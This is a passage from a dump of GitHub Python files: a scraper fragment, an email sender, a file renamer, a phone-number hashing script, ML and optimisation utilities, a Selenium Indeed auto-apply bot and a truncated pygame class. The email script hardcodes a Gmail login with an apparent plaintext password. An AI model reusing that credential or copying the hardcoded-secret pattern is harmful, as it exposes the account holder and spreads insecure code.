list(columns)\n columns.clear()\n columns = (\"Category\",\"Price\",\"Link\")\n items_amount_old = items_amount\n current_time = datetime.datetime.now().strftime(\"%H:%M:%S\")\n entry = f\"{current_time} - The site's listings were updated (from {items_amount_old} to {items_amount})...\"\n progress_callback(0,1)\n return entry, entry_xl, items_amount_old, columns\n\n elif \"hintaopas.fi\" in website:\n debug.d_print(\"Scanning main page\")\n progress_callback(0,1)\n list_items = soup.find_all('li', class_='SubLevelItem-sc-1niqwua-6 cLkuDP')\n for item in list_items:\n name = item.a.text\n link = item.a['href']\n entry_xl.append((name, \"https://hintaopas.fi\" + link))\n items_amount += 1\n \n items_amount_old = items_amount\n 
columns =(\"Category\", \"Link\")\n current_time = datetime.datetime.now().strftime(\"%H:%M:%S\")\n entry = f\"{current_time} - The site's listings were updated (from {items_amount_old} to {items_amount})...\"\n progress_callback(1,1)\n return entry, entry_xl, items_amount_old, columns\n","repo_name":"D3SXX/website-checker","sub_path":"website_processing.py","file_name":"website_processing.py","file_ext":"py","file_size_in_byte":15838,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"29606754272","text":"#!/usr/bin/python\n \n# Import smtplib for the actual sending function\nimport smtplib\n \n# For guessing MIME type\nimport mimetypes\n \n# Import the email modules we'll need\nimport email\nimport email.mime.application\n \n#Import sys to deal with command line arguments\nimport sys\n \n# Create a text/plain message\nmsg = email.mime.Multipart.MIMEMultipart()\nmsg['Subject'] = sys.argv[1]\nmsg['From'] = 'triomproductions@gmail.com'\nmsg['To'] = 'triomproductions@gmail.com'\n \n# The main body is just another attachment\n\nbody = email.mime.Text.MIMEText(sys.argv[2])\nmsg.attach(body)\n \n# PDF attachment block code\n\nadd_attachment = 1;\nif (len(sys.argv) < 4):\n\tadd_attachment = 0;\n\nif (add_attachment == 1):\n\tdirectory=sys.argv[2]\n\t \n\t# Split de directory into fields separated by / to substract filename\n\t \n\tspl_dir=directory.split('/')\n\t \n\t# We attach the name of the file to filename by taking the last\n\t# position of the fragmented string, which is, indeed, the name\n\t# of the file we've selected\n\t \n\tfilename=spl_dir[len(spl_dir)-1]\n\t \n\t# We'll do the same but this time to extract the file format (pdf, epub, docx...)\n\t \n\tspl_type=directory.split('.')\n\t \n\ttype=spl_type[len(spl_type)-1]\n\t \n\tfp=open(directory,'rb')\n\tatt = email.mime.application.MIMEApplication(fp.read(),_subtype=type)\n\tfp.close()\n\tatt.add_header('Content-Disposition','attachment',filename=filename)\n\tmsg.attach(att)\n \n# send via Gmail server\n# NOTE: my ISP, Centurylink, seems to be automatically rewriting\n# port 25 packets to be port 587 and it is trashing port 587 packets.\n# So, I use the default port 25, but I authenticate.\ns = smtplib.SMTP('smtp.gmail.com:587')\ns.starttls()\ns.login('triomproductions@gmail.com','pi@1335e')\ns.sendmail('triomproductions@gmail.com',msg['To'], msg.as_string())\ns.quit()","repo_name":"eedmond/FooBartender","sub_path":"Utilities/send_mail.py","file_name":"send_mail.py","file_ext":"py","file_size_in_byte":1765,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"44161225233","text":"import os\nimport re\nimport collections\nimport argparse\nfrom collections import Counter\nfrom typing import Dict, Tuple, List, Any\n\nRENAME_PATTERN = r'(.*)\\s*(S\\d{2}E\\d{2}).*(\\..*)'\n\n\ndef parse_args():\n parser = argparse.ArgumentParser(description='Rename series files. 
Useful for services like Plex.')\n parser.add_argument('path', type=str, help='path to directory with files')\n parser.add_argument('-i', '--info', help=\"do not make changes, just show rename suggestions\", action=\"store_true\")\n args = parser.parse_args()\n return args\n\n\ndef create_suggestions(file_names: List[str]) -> Tuple[List[str], Dict[str, str]]:\n prefix_counter: Counter[str] = collections.Counter()\n suggestions: Dict[str, str] = dict()\n\n print('Looking for files in a directory...')\n for filename in sorted(file_names):\n match = re.search(RENAME_PATTERN, filename, flags=re.IGNORECASE)\n if match:\n series_name = re.compile(r'(\\W+)').sub(' ', match[1]).strip()\n prefix_counter[series_name] += 1\n season_and_episode = match[2].lower()\n extension = match.groups()[-1][1:]\n suggestion = \"{}.{}\".format(season_and_episode, extension)\n suggestions[filename] = suggestion\n else:\n print(\"[WARN] File name does not match renaming pattern: {}\".format(filename))\n\n common_prefixes = [x[0] for x in prefix_counter.most_common(3)]\n return common_prefixes, suggestions\n\n\ndef rename_files(dir_path: str, prefix: str, suggestions: Dict[str, str]):\n print(\"Renaming...\")\n for old_filename, suggestion in suggestions.items():\n old_path = os.path.abspath(\"{}/{}\".format(dir_path, old_filename))\n new_path = os.path.abspath(\"{}/{}\".format(dir_path, \"{} {}\".format(prefix, suggestion)))\n os.rename(old_path, new_path)\n print(\"Done!\")\n\n\ndef main():\n args = parse_args()\n (dir_path, _, file_names) = next(os.walk(args.path))\n\n common_prefixes, suggestions = create_suggestions(file_names)\n\n if len(common_prefixes) > 1:\n print(\"Common prefixes:\")\n for p in common_prefixes:\n print(p)\n\n most_common_prefix = common_prefixes[0]\n\n input_prefix = input('Enter prefix (empty for \"{}\"): '.format(most_common_prefix)).strip()\n prefix = most_common_prefix if input_prefix == '' else input_prefix\n\n print('Rename suggestions:')\n for old_filename, suggestion in suggestions.items():\n print(\"{} -> {}\".format(old_filename, \"{} {}\".format(prefix, suggestion)))\n\n if args.info:\n return\n\n answer = input(\"Press y for continue: \").lower().strip()\n if answer != 'y':\n print(\"Сanceled.\")\n return\n\n rename_files(dir_path, prefix, suggestions)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"winogradoff/tv-series-renamer","sub_path":"tv-series-renamer.py","file_name":"tv-series-renamer.py","file_ext":"py","file_size_in_byte":2771,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"16467201874","text":"# -*- coding: utf-8 -*-\nimport time\nimport hashlib\nimport traceback\nimport pandas as pd\n\n# 配置\nmapping = {\n \"cy\": [(1, 7), (4, 5)], # 餐饮(测试)\n # \"cy\": [(1, 187432), (4, 220703)], # 餐饮\n \"cs\": [(2, 48732), (5, 22389), (7, 72084), (8, -1)], # 催收\n \"ys\": [(3, 193302), (6, -1)] # 疑似催收\n}\n\n\ndef format_tel(tel):\n if isinstance(tel, str):\n return ''.join(i for i in tel if i.isdigit())\n else:\n return None\n\n\ndef phone_encode(string, method=\"md5_sha1\"):\n try:\n if not string:\n return None\n if 'md5' in method:\n m = hashlib.md5()\n m.update(string.encode(encoding='utf-8'))\n string = m.hexdigest()\n string = string[0:32]\n if 'sha1' in method:\n s = hashlib.sha1()\n s.update(string.encode(encoding='utf-8').upper())\n string = s.hexdigest().upper()\n return string\n except:\n print(traceback.format_exc())\n return None\n\n\ndef cuishou_db_typed(cuishou_file, canyin_file, 
new_cuishou_db_file):\n try:\n cuishou = pd.read_csv(cuishou_file, header=None, names=['tel', 'type'])\n cs = cuishou[cuishou.type == 1].reset_index(drop=True)\n ys = cuishou[cuishou.type == 2].reset_index(drop=True)\n cy = pd.read_csv(canyin_file, header=None, names=['tel'], dtype=str)\n cy['tel'] = cy.tel.map(format_tel).map(phone_encode)\n cy = cy.dropna().reset_index(drop=True)\n cy['type'] = pd.Series([], dtype=object)\n for types, item in mapping.items():\n tmp = 0\n for k, v in item:\n if v != -1:\n eval(types).loc[tmp: tmp + v - 1, 'type'] = int(k)\n else:\n eval(types).loc[tmp:, 'type'] = int(k)\n tmp += v\n cy = cy.dropna()\n df = cy.append(cs).append(ys)\n df.sort_values('type').to_csv('new_cuishou_db', index=False, header=False)\n return df\n except:\n print(traceback.format_exc())\n return None\n\n\ndef main():\n st = time.time()\n df = cuishou_db_typed('cuishou_db', 'canyin.tel', 'new_cuishou_db')\n print(time.time() - st)\n print(df.groupby('type').count())\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"HsuChihwei/Hupyter","sub_path":"work/canyin.py","file_name":"canyin.py","file_ext":"py","file_size_in_byte":2273,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"40363190106","text":"import contextlib\nimport functools\nimport os\nfrom absl import logging\nimport paddle as pd\nimport numpy as np\nimport math\ndef activation_fn(features, act_fn):\n \"\"\"Customized non-linear activation type.\"\"\"\n if act_fn in ('silu', 'swish'):\n return pd.nn.functional.swish(features)\n elif act_fn == 'silu_native':\n return features * pd.nn.functional.sigmoid(features)\n elif act_fn == 'hswish':\n return features * pd.nn.functional.relu6(features + 3) / 6\n elif act_fn == 'relu':\n return pd.nn.functional.relu(features)\n elif act_fn == 'relu6':\n return pd.nn.functional.relu6(features)\n elif act_fn == 'elu':\n return pd.nn.functional.elu(features)\n elif act_fn == 'leaky_relu':\n return pd.nn.functional.leaky_relu(features)\n elif act_fn == 'selu':\n return pd.nn.functional.selu(features)\n elif act_fn == 'mish': \n return features * pd.tanh(pd.nn.functional.softplus(features))\n else:\n raise ValueError('Unsupported act_fn {}'.format(act_fn))\n\ndef get_act_fn(act_fn):\n if not act_fn:\n return pd.nn.functional.silu\n if isinstance(act_fn, str):\n return functools.partial(activation_fn, act_fn=act_fn)\n return act_fn\n\ndef build_optimizer(learning_rate,\n optimizer_name='rmsprop',\n decay=0.9,\n epsilon=0.001,\n momentum=0.9):\n \"\"\"Build optimizer.\"\"\"\n if optimizer_name == 'sgd':\n logging.info('Using SGD optimizer')\n optimizer = pd.optimizer.SGD(learning_rate=learning_rate)\n elif optimizer_name == 'momentum':\n logging.info('Using Momentum optimizer')\n optimizer = pd.optimizer.Momentum(learning_rate=learning_rate, momentum=momentum)\n elif optimizer_name == 'rmsprop':\n logging.info('Using RMSProp optimizer')\n optimizer = pd.optimizer.RMSProp(learning_rate=learning_rate, weight_decay=decay, momentum=momentum, epsilon=epsilon)\n elif optimizer_name == 'adam':\n logging.info('Using Adam optimizer')\n optimizer = pd.optimizer.Adam(learning_rate)\n else:\n logging.fatal('Unknown optimizer: %s', optimizer_name)\n\n return optimizer\n\ndef normalization(norm_type: str,\n axis=-1,\n epsilon=0.001,\n momentum=0.99,\n groups=8,\n name=None):\n \"\"\"Normalization after conv layers.\"\"\"\n if norm_type == 'gn':\n return pd.nn.GroupNorm(num_groups=groups, num_channels=axis, epsilon=epsilon)\n else:\n return 
pd.nn.BatchNorm(num_channels=axis, momentum=momentum, epsilon=epsilon)\n\ndef drop_connect(inputs, is_training, survival_prob):\n \"\"\"Drop the entire conv with given survival probability.\"\"\"\n # \"Deep Networks with Stochastic Depth\", https://arxiv.org/pdf/1603.09382.pdf\n if not is_training:\n return inputs\n\n # Compute tensor.\n batch_size = pd.shape(inputs)[0]\n random_tensor = survival_prob\n random_tensor += pd.uniform([batch_size, 1, 1, 1], dtype=inputs.dtype)\n binary_tensor = pd.floor(random_tensor)\n # Unlike conventional way that multiply survival_prob at test time, here we\n # divide survival_prob at training time, such that no addition compute is\n # needed at test time.\n output = inputs / survival_prob * binary_tensor\n return output\n\n\nclass Pair(tuple):\n\n def __new__(cls, name, value):\n return super().__new__(cls, (name, value))\n\n def __init__(self, name, _): # pylint: disable=super-init-not-called\n self.name = name\n\n@contextlib.contextmanager\ndef float16_scope():\n \"\"\"Scope class for float16.\"\"\"\n\n def _custom_getter(getter, *args, **kwargs):\n \"\"\"Returns a custom getter that methods must be called under.\"\"\"\n cast_to_float16 = False\n requested_dtype = kwargs['dtype']\n if requested_dtype == pd.float16:\n kwargs['dtype'] = pd.float32\n cast_to_float16 = True\n var = getter(*args, **kwargs)\n if cast_to_float16:\n var = pd.cast(var, pd.float16)\n return var\n\ndef round_filters(filters, mconfig, skip=False):\n \"\"\"Round number of filters based on depth multiplier.\"\"\"\n multiplier = mconfig.width_coefficient\n divisor = mconfig.depth_divisor\n min_depth = mconfig.min_depth\n if skip or not multiplier:\n return filters\n filters *= multiplier\n min_depth = min_depth or divisor\n new_filters = max(min_depth, int(filters + divisor / 2) // divisor * divisor)\n if new_filters < 0.9 * filters: # prevent rounding by more than 10%\n new_filters += divisor\n return int(new_filters)\n\n\ndef round_repeats(repeats, multiplier, skip=False):\n \"\"\"Round number of filters based on depth multiplier.\"\"\"\n if skip or not multiplier:\n return repeats\n return int(math.ceil(multiplier * repeats))\n\ndef cal_padding(img_size, stride, filter_size, dilation=1):\n \"\"\"Calculate padding size.\"\"\"\n if img_size % stride == 0:\n out_size = max(filter_size - stride, 0)\n else:\n out_size = max(filter_size - (img_size % stride), 0)\n return out_size // 2, out_size - out_size // 2\n\ndef conv_kernel_initializer(shape, dtype=None, partition_info=None):\n \"\"\"定义卷积核初始化.\n 调用paddle.normal生成符合正态分布的随机Tensor\n \"\"\"\n del partition_info\n kernel_height, kernel_width, _, out_filters = shape\n fan_out = int(kernel_height * kernel_width * out_filters)\n return pd.normal(\n shape=shape, mean=0.0, std=np.sqrt(2.0 / fan_out), dtype=dtype)\n\n\ndef dense_kernel_initializer(shape, dtype=None, partition_info=None):\n \"\"\"稠密dense层初始化\n 调用paddle.uniform实现均匀分布\n \"\"\"\n del partition_info\n init_range = 1.0 / np.sqrt(shape[1])\n return pd.uniform(shape, min=-init_range, max=init_range, dtype=dtype)","repo_name":"Stave604671/paddlepaddle_efficientnetv2","sub_path":"tools/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":5563,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"12633435401","text":"# -*- coding: utf-8 -*-\n\nimport geatpy as ea\nimport numpy as 
np\n\n\"\"\"\n\n本案例展示了如何快速创建问题对象、快速调用算法求解一个含两个约束的单目标优化问题。\n跟soea_quick_start_aimFunc案例不同的是,本案例通过装饰器single标记目标函数aimFunc,使得它传入的种群对象只有单个个体。\n\n\"\"\"\n\nif __name__ == '__main__':\n # 构建问题\n r = 1 # 模拟该案例问题计算目标函数时需要用到的额外数据\n @ea.Problem.single\n def aimFunc(pop): # 定义目标函数(含约束)\n Vars = pop.Phen\n pop.ObjV = np.sum((Vars - r) ** 2, 1, keepdims=True) # 计算目标函数值,赋值给种群对象的ObjV属性\n x1 = Vars[:, [0]] # 把Vars的第0列取出来\n x2 = Vars[:, [1]] # 把Vars的第1列取出来\n pop.CV = np.hstack([(x1 - 0.5) ** 2 - 0.25,\n (x2 - 1) ** 2 - 1]) # 计算违反约束程度值,赋值给种群对象的CV属性\n\n problem = ea.Problem(name='soea quick start demo',\n M=1, # 目标维数\n maxormins=[1], # 目标最小最大化标记列表,1:最小化该目标;-1:最大化该目标\n Dim=5, # 决策变量维数\n varTypes=[0, 0, 1, 1, 1], # 决策变量的类型列表,0:实数;1:整数\n lb=[-1, 1, 2, 1, 0], # 决策变量下界\n ub=[1, 4, 5, 2, 1], # 决策变量上界\n aimFunc=aimFunc)\n # 构建算法\n algorithm = ea.soea_SEGA_templet(problem,\n ea.Population(Encoding='RI', NIND=20),\n MAXGEN=50, # 最大进化代数。\n logTras=1, # 表示每隔多少代记录一次日志信息,0表示不记录。\n trappedValue=1e-6, # 单目标优化陷入停滞的判断阈值。\n maxTrappedCount=10) # 进化停滞计数器最大上限值。\n # 求解\n res = ea.optimize(algorithm, verbose=True, drawing=1, outputMsg=True, drawLog=False, saveFlag=True)\n print(res)\n","repo_name":"0x886c/geatpy","sub_path":"geatpy/demo/soea_demo/soea_quick_start_aimFunc_single/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2231,"program_lang":"python","lang":"zh","doc_type":"code","dataset":"github-code","pt":"44"} +{"seq_id":"74856983812","text":"from jinja2 import Undefined\nfrom psutil import users\nfrom selenium import webdriver\nimport random\nimport time\nimport os\nimport pytools # note: pytools is my own python library, to use it, download it here: https://github.com/Ghostcrafter090/pytools\nimport sys as sysn\n\n# Globals\nclass globals:\n broswer = '' # allows access to browser driver at all levels of application\n user = \"\"\n passwd = \"\"\n questions = {}\n\n# Sys class, contains main components\nclass sys:\n def start():\n globals.browser = webdriver.Firefox()\n\n # Used for signing in, requires user interaction in the form of verification and recapcha\n def signin(username, password):\n globals.browser.get(\"https://secure.indeed.com/auth?hl=en_CA&co=CA&continue=https%3A%2F%2Fca.indeed.com%2Fcmp%2FLeap-Tools-Inc.-1%2Fjobs%3Fjk%3D562c7031db35aae8%26start%3D0%26clearPrefilter%3D1&tmpl=desktop&from=gnav-util-acme--acme-webapp&_ga=2.205514322.358284476.1651172242-1342485949.1651172242\")\n time.sleep(1)\n\n # contains primary functions of the bot, main actions used based on criteria are stored here.\n class funcs:\n def apply(jobf):\n sys.exe.goto(jobf.get_attribute('href'))\n time.sleep(3)\n try:\n test = globals.browser.find_element_by_css_selector(\"button[id=indeedApplyButton]\").get_attribute(\"innerText\") != \"Apply Now ✓\"\n except:\n test = True\n print(test)\n try:\n if test == True:\n globals.browser.find_elements_by_css_selector(\"button[id=indeedApplyButton]\")[0].click()\n time.sleep(3)\n out = 1\n fnl = 0\n while (out != 0) and (fnl < 100):\n try:\n out = pageAction()\n except:\n print(\"Unexpected apply error:\", sysn.exc_info())\n fnl = fnl + 1\n return 1\n except:\n pass\n return 0\n\n class questions:\n def checkQuestions(question):\n answer = input(\"Answer (yes/*) ? \")\n confirm = False\n while confirm == False:\n if answer == \"yes\":\n final = input(\"Response: \")\n globals.questions[question] = final\n else:\n globals.questions[question] = \"?ask\"\n sure = input(\"Are you sure (yes/*) ? 
\")\n if sure == \"yes\":\n confirm = True\n print(globals.questions)\n pytools.IO.saveJson(\"questions.json\", globals.questions)\n\n # https://ca.indeed.com/jobs?q=Junior%20Developer&l=Canada&lang=en&taxo1=EHPW9&remotejob=032b3046-06a3-4876-8dfd-474eb5e7ed11&vjk=89a07d50778ecdc7\n\n def answerQuestions():\n globals.questions = pytools.IO.getJson(\"questions.json\")\n yes = True\n n = 0\n while yes:\n try:\n noError = False\n quest = globals.browser.find_element_by_css_selector('div[id=q_' + str(n) + ']')\n try:\n box = quest.find_elements_by_css_selector('[id=' + quest.find_elements_by_css_selector('label')[0].get_attribute('for') + ']')[0]\n noError = True\n except:\n tools.pause()\n if noError:\n boxType = \"new\"\n if box.tag_name == \"textarea\":\n boxType = \"textarea\"\n elif box.tag_name == \"select\":\n boxType = \"select\"\n elif box.tag_name == \"input\":\n if box.get_attribute('type') == \"number\":\n boxType = \"input-number\"\n if box.get_attribute('type') == \"text\":\n boxType = \"input-text\"\n if box.get_attribute('type') == \"date\":\n boxType = \"input-date\"\n if box.get_attribute('type') == \"tel\":\n boxType = \"input-tel\"\n elif box.tag_name == \"fieldset\":\n boxType = \"fieldset\"\n quest = globals.browser.find_element_by_css_selector('div[id=q_' + str(n) + ']')\n try:\n tools.dummy(globals.questions[quest.get_attribute('innerText') + \"_\" + boxType])\n except:\n print(quest.get_attribute('innerText') + \"_\" + boxType)\n sys.funcs.questions.checkQuestions(quest.get_attribute('innerText') + \"_\" + boxType)\n if globals.questions[quest.get_attribute('innerText') + \"_\" + boxType] == \"?ask\":\n confirm = False\n while confirm == False:\n answer = input(\"Response: \")\n check = input(\"Are you sure (yes/*) ? \")\n if check == \"yes\":\n confirm = True\n else:\n answer = globals.questions[quest.get_attribute('innerText') + \"_\" + boxType]\n quest.find_elements_by_css_selector('[id=' + quest.find_elements_by_css_selector('label')[0].get_attribute('for') + ']')[0]\n box = quest.find_elements_by_css_selector('[id=' + quest.find_elements_by_css_selector('label')[0].get_attribute('for') + ']')[0]\n if box.tag_name == \"textarea\":\n box.clear()\n for letter in answer:\n print(letter)\n box.send_keys(letter)\n wait_time = random.randint(0, 500) / 10000\n time.sleep(wait_time)\n elif box.tag_name == \"select\":\n box.find_elements_by_css_selector('option')[int(answer)].click()\n elif box.tag_name == \"input\":\n box.clear()\n if box.get_attribute('type') == \"number\":\n for letter in answer:\n print(letter)\n box.send_keys(letter)\n wait_time = random.randint(0, 500) / 10000\n time.sleep(wait_time)\n if box.get_attribute('type') == \"text\":\n for letter in answer:\n print(letter)\n box.send_keys(letter)\n wait_time = random.randint(0, 500) / 10000\n time.sleep(wait_time)\n if box.get_attribute('type') == \"date\":\n if answer == \"today\":\n globals.browser.execute_script('document.getElementById(\"' + box.get_attribute('id') + '\").valueAsDate = new Date()')\n else:\n dateArray = pytools.clock.getDateTime()\n globals.browser.execute_script('document.getElementById(\"' + box.get_attribute('id') + '\").valueAsDate = new Date(\"' + answer.split(\"-\")[0] + '-' + answer.split(\"-\")[1] + '-' + answer.split(\"-\")[2] + '\")')\n tools.pause()\n if box.get_attribute('type') == \"tel\":\n for letter in answer:\n print(letter)\n box.send_keys(letter)\n wait_time = random.randint(0, 500) / 10000\n time.sleep(wait_time)\n elif box.tag_name == \"fieldset\":\n 
quest.find_elements_by_css_selector('label[for=' + quest.find_elements_by_css_selector('label')[0].get_attribute('for') + '-' + str(answer) + ']')[0].click()\n elif box.tag_name == 'div':\n box.find_elements_by_css_selector('label[for=' + box.find_elements_by_css_selector('input')[int(answer)].get_attribute('id') + ']')[0].find_elements_by_css_selector('span')[0].click()\n except:\n print(\"Unexpected error:\", sysn.exc_info())\n yes = False\n n = n + 1\n globals.browser.find_elements_by_css_selector(\"div[class=ia-pageButtonGroup]\")[0].find_elements_by_css_selector(\"button\")[1].click()\n \n def forward():\n globals.browser.find_elements_by_css_selector(\"div[class=ia-pageButtonGroup]\")[0].find_elements_by_css_selector(\"button\")[1].click()\n\n def jobExpo():\n globals.browser.find_elements_by_css_selector('div[role=radio]')[0].click()\n globals.browser.find_elements_by_css_selector(\"div[class=ia-pageButtonGroup]\")[0].find_elements_by_css_selector(\"button\")[1].click()\n\n def coverLetter(f):\n globals.browser.find_elements_by_css_selector(\"div[id=write-cover-letter-selection-card]\")[f].click()\n time.sleep(1)\n text = pytools.IO.getFile('message.txt')\n text_input = globals.browser.find_element_by_css_selector('textarea[id=coverletter-textarea]')\n text_input.clear()\n for letter in text:\n print(letter)\n text_input.send_keys(letter)\n wait_time = random.randint(0, 500) / 10000\n time.sleep(wait_time)\n time.sleep(1)\n globals.browser.find_elements_by_css_selector(\"div[class=ia-pageButtonGroup]\")[0].find_elements_by_css_selector(\"button\")[1].click()\n \n def addResume():\n globals.browser.find_elements_by_css_selector('div[id=ia-IndeedResumeSelect-headerButton]')[0].click()\n globals.browser.find_elements_by_css_selector(\"div[class=ia-pageButtonGroup]\")[0].find_elements_by_css_selector(\"button\")[1].click()\n\n def yesImSmart():\n globals.browser.find_elements_by_css_selector('div[class=ia-InterventionActionButtons]')[0].find_elements_by_css_selector('button')[0].click()\n \n\n # small functions for making my life easier\n class exe:\n def goto(url):\n globals.browser.get(url)\n\n# more general tools\nclass tools:\n def pause():\n os.system(\"pause\")\n\n def dummy(inf):\n return inf == inf\n\n# Main function\ndef main():\n\n nameCrit = {\n \"containsOr\": [\n \"Develop\",\n \"Programmer\",\n \"Software\"\n \"Java \"\n ],\n \"containsAnd\": [],\n \"!contains\": [\n \"Senior\",\n \"Sales\",\n \"Analytics\"\n ]\n }\n\n try:\n print(\"Username: \" + sysn.argv[1])\n globals.user = sysn.argv[1]\n globals.passwd = sysn.argv[2]\n except:\n pass\n sys.start()\n sys.signin(globals.user, globals.passwd)\n tools.pause()\n sys.exe.goto(\"https://ca.indeed.com/jobs?q=Developer&l=Canada&jt=fulltime&sort=date&fromage=7&lang=en&taxo2=EHPW9&remotejob=032b3046-06a3-4876-8dfd-474eb5e7ed11\")\n while True:\n add = 0\n i = 0\n while i < len(globals.browser.find_elements_by_css_selector(\"a\")):\n print(i)\n sys.exe.goto(\"https://ca.indeed.com/jobs?q=Developer&l=Canada&jt=fulltime&sort=date&fromage=7&lang=en&taxo2=EHPW9&remotejob=032b3046-06a3-4876-8dfd-474eb5e7ed11\")\n time.sleep(3)\n app = 0\n while app != 1:\n fn = True\n while fn and (i < len(globals.browser.find_elements_by_css_selector(\"a\"))):\n print(i)\n try:\n jobf = globals.browser.find_elements_by_css_selector(\"a\")[i]\n job = jobf.find_elements_by_css_selector(\"td[class=resultContent]\")[0]\n fn = False\n except:\n pass\n i = i + 1\n containsAnd = True\n containsOr = False\n notContains = True\n try:\n 
print(job.find_elements_by_css_selector(\"h2\")[0].get_attribute(\"innerText\"))\n try:\n for crit in nameCrit[\"containsAnd\"]:\n if job.find_elements_by_css_selector(\"h2\")[0].get_attribute(\"innerText\").find(crit) == -1:\n containsAnd = False\n except:\n pass\n for crit in nameCrit[\"containsOr\"]:\n if job.find_elements_by_css_selector(\"h2\")[0].get_attribute(\"innerText\").find(crit) != -1:\n containsOr = True\n for crit in nameCrit[\"!contains\"]:\n if job.find_elements_by_css_selector(\"h2\")[0].get_attribute(\"innerText\").find(crit) != -1:\n notContains = False\n print(\"contains requirements: \" + str(containsAnd))\n print(\"contains one opt requirement: \" + str(containsOr))\n print(\"doesn't contain blacklist requirements: \" + str(notContains))\n add = add + 1\n if (containsAnd) and (containsOr) and (notContains):\n app = sys.funcs.apply(jobf)\n add = 0\n sys.exe.goto(\"https://ca.indeed.com/jobs?q=Developer&l=Canada&jt=fulltime&sort=date&fromage=7&lang=en&taxo2=EHPW9&remotejob=032b3046-06a3-4876-8dfd-474eb5e7ed11\")\n time.sleep(3)\n if add > 100:\n i = 0\n add = 0\n sys.exe.goto(\"https://ca.indeed.com/jobs?q=Developer&l=Canada&jt=fulltime&sort=date&fromage=7&lang=en&taxo2=EHPW9&remotejob=032b3046-06a3-4876-8dfd-474eb5e7ed11\")\n time.sleep(3)\n except:\n print(\"Unexpected main error:\", sysn.exc_info())\n sys.exe.goto(\"https://ca.indeed.com/jobs?q=Developer&l=Canada&jt=fulltime&sort=date&fromage=7&lang=en&taxo2=EHPW9&remotejob=032b3046-06a3-4876-8dfd-474eb5e7ed11\")\n time.sleep(3)\n i = i + 1\n\ndef pageAction():\n h1 = globals.browser.find_element_by_css_selector('h1').get_attribute('innerText')\n out = 0\n if h1 == 'Add a resume for the employer':\n sys.funcs.questions.forward()\n out = 1\n elif h1 == 'Select a past job that shows relevant experience':\n sys.funcs.questions.jobExpo()\n out = 2\n elif h1 == 'Consider adding supporting documents':\n try:\n sys.funcs.questions.coverLetter(0)\n except:\n sys.funcs.questions.coverLetter(1)\n out = 3\n elif h1.find('Questions from') != -1:\n sys.funcs.questions.answerQuestions()\n out = 4\n elif h1 == 'Please review your application':\n sys.funcs.questions.forward()\n out = 5\n elif h1.find('Add a resume') != -1:\n sys.funcs.questions.addResume()\n out = 6\n elif h1.find('Do you have these qualifications') != -1:\n sys.funcs.questions.yesImSmart()\n out = 7\n elif h1.find('Want to include any supporting documents?'):\n try:\n sys.funcs.questions.coverLetter(1)\n except:\n sys.funcs.questions.coverLetter(0)\n out = 8\n return out\n\n","repo_name":"Ghostcrafter090/Indeed-Application-Bot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":16427,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"16691472559","text":"# Design a program that uses a while loop and continuously asks the user to \n# enter a word unless the user enters \"chupacabra\" as the secret exit word, in which case \n# the message \"You've successfully left the loop.\" should be printed to the screen, \n# and the loop should terminate.\n\nsecret_word = \"chupacabra\"\nword = input(\"Enter the secret word!: \")\n\nwhile True:\n if word == secret_word:\n break\n word = input(\"Wrong word muggle, gess again!\")\nprint(\"Lucky muggle! 
You've successfully left the loop.\")","repo_name":"chimezdev/python-projects","sub_path":"loops/guess_secret_word.py","file_name":"guess_secret_word.py","file_ext":"py","file_size_in_byte":518,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"3422081849","text":"\nimport pygame\nimport settings\nimport math\n\nfrom pygame.locals import (\n K_UP,\n K_DOWN,\n K_LEFT,\n K_RIGHT,\n K_ESCAPE,\n K_SPACE,\n KEYDOWN,\n K_RETURN,\n K_F4,\n QUIT\n)\n\n\nclass Player():\n\n def __init__(self, startposition, color, size, delay, settings, enemylist, spawnRadius, highscore):\n self.screen = settings.screen\n self.settings = settings\n self.color = color\n self.size = size\n self.delay = delay\n self.playerMoveCounter = 0\n self.counter = 0\n self.playerPos = pygame.Vector2(startposition[0], startposition[1])\n self.EnemyList = enemylist\n self.SpawnRadius = spawnRadius\n self.Ability = False\n self.Ability_activationTime = 600\n self.Ability_counter = 0\n self.Ability_costs = 0.90 # 10%\n self.highscore = highscore\n self.abilitytext = \"\"\n\n def move(self):\n keys = pygame.key.get_pressed()\n if keys[K_LEFT] or keys[pygame.K_a]:\n if self.playerPos.x > 0:\n self.playerPos.x -= 1\n if not keys[K_RIGHT]:\n self.counter += 1\n\n if keys[K_RIGHT] or keys[pygame.K_d]:\n if self.playerPos.x < self.settings.width - self.settings.defaultSize:\n self.playerPos.x += 1\n if not keys[K_LEFT]:\n self.counter += 1\n\n if keys[K_UP] or keys[pygame.K_w]:\n if self.playerPos.y > 0:\n self.playerPos.y -= 1\n if not keys[K_DOWN]:\n self.counter += 1\n\n if keys[K_DOWN] or keys[pygame.K_s]:\n if self.playerPos.y < self.settings.height-self.settings.defaultSize:\n self.playerPos.y += 1\n if not keys[K_UP]:\n self.counter += 1\n if keys[K_SPACE]:\n if self.Ability == False and self.Ability_counter == -1:\n self.Ability = True\n self.Ability_counter = 0\n self.highscore.PlayerHighscore = math.floor(\n self.highscore.PlayerHighscore * self.Ability_costs)\n#################### tick every 0.0001 s #####################\n\n def tick(self, _clocktime):\n self.playerMoveCounter += _clocktime\n self.player_draw()\n\n if self.playerMoveCounter >= self.delay:\n ###################### Update Highscore ##################\n if self.Ability == False:\n self.highscore.PlayerHighscore += len(self.EnemyList)\n\n ###################### ABILITY CHECK #####################\n if self.Ability == True:\n self.Ability_counter += 1\n if self.Ability_counter >= self.Ability_activationTime:\n self.Ability = False\n elif self.Ability_counter <= 1000 and self.Ability_counter > 0: #### 1000 cooldown\n 